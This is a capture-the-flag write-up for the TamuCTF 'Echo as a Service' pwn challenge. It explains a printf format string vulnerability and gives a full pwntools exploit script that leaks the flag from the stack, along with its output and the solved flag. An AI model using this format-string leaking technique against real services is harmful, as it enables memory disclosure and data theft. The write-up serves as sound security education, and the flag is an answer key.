## Echo as a Service

* **CTF:** Tamu CTF
* **Category:** pwn
* **Points:** 113
* **Author(s):** b0uldrr
---

### Challenge
```
Echo as a service (EaaS) is going to be the newest hot startup! We've tapped a big market: Developers who really like SaaS.

nc challenges.tamuctf.com 4251
```

### Downloads
* [binary](echoasaservice)

---

### Solution

Connecting to the remote server, we are prompted for input and it is immediately echoed back.

![example](images/example.png)

I opened the provided binary in Ghidra and examined the main function.

![main](images/main.png)

We can see in the main function that the program opens a local file, `flag.txt`, and stores it in a local variable buffer, `local_48`, with a buffer size of 32 bytes. It then enters a permanent loop, prompting the user for input with `gets(local_28)` and then printing that input directly to screen with `printf(local_28)`. 

Because the program puts our user input directly into the `printf()` call (as opposed to formatting with like `printf("%s", local_28)`) it is vulnerable to a format string attack. If we enter our input as multiple `%p` characters, we can leak values from the stack. With enough of them, we can leak the flag value, which was previously stored on the stack in variable `local_48`.

The only thing we have to figure out is exactly where the flag value is stored on the stack and how many `%p` characters we need to input to leak it. To do this, I created a fake flag.txt file with a single line of `aaaabbbbccccddddeeeeffff` and then ran the local binary and input a dozen `%p` chars. Sure enough, we can see our flag (in their hex values 0x61-0x66) in the 8th, 9th and 10th outputs.

I wrote a python script to connect to the remote server, leak the stack, and then interpret and print the flag.

```
#! /usr/bin/python3

import pwn

local = True

if local:
    conn = pwn.process("./echoasaservice")
else:
    conn = pwn.remote("challenges.tamuctf.com", 4251)

payload = "%p "*12

# leak the stack
print(conn.recvuntil("(EaaS)\n"))
conn.sendline(payload)
response = conn.recvline()
print("Stack leak:", response)

# isolate the returned stack leak which holds the flag value
flag = response.split()[7:10]
print("The flag in little-endian hex format:", flag)

for f in flag:

    # remove leading 0x
    f = f[2:]

    # split the string into chunks of 2 characters and put those into the out array
    n = 2
    out = [(f[i:i+n]) for i in range(0, len(f), n)]

    # reverse the order (because we're in little endian)
    out.reverse()

    # convert those chars from hex to int and then to char, print to screen
    for c in out:
        print(chr(int(c, 16)),end='')

print()
```

And running it...
```
tmp@localhost:~/ctf/tamu/echo_as_a_service$ ./soln.py 
[+] Opening connection to challenges.tamuctf.com on port 4251: Done
b'Echo as a service (EaaS)\n'
b'0x5580ab2a54a1 0x7fa6b428b8d0 0x7fa6b4289a00 0x5580ab2a54c5 (nil) 0x7fff4c7df568 0x5580ab2a4260 0x61337b6d65676967 0x616d7230665f7973 0x7d316e6c75765f74 (nil) 0x7025207025207025 \n'
[b'0x61337b6d65676967', b'0x616d7230665f7973', b'0x7d316e6c75765f74']
gigem{3asy_f0rmat_vuln1}
```
---

### Flag 
```
gigem{3asy_f0rmat_vuln1}
```
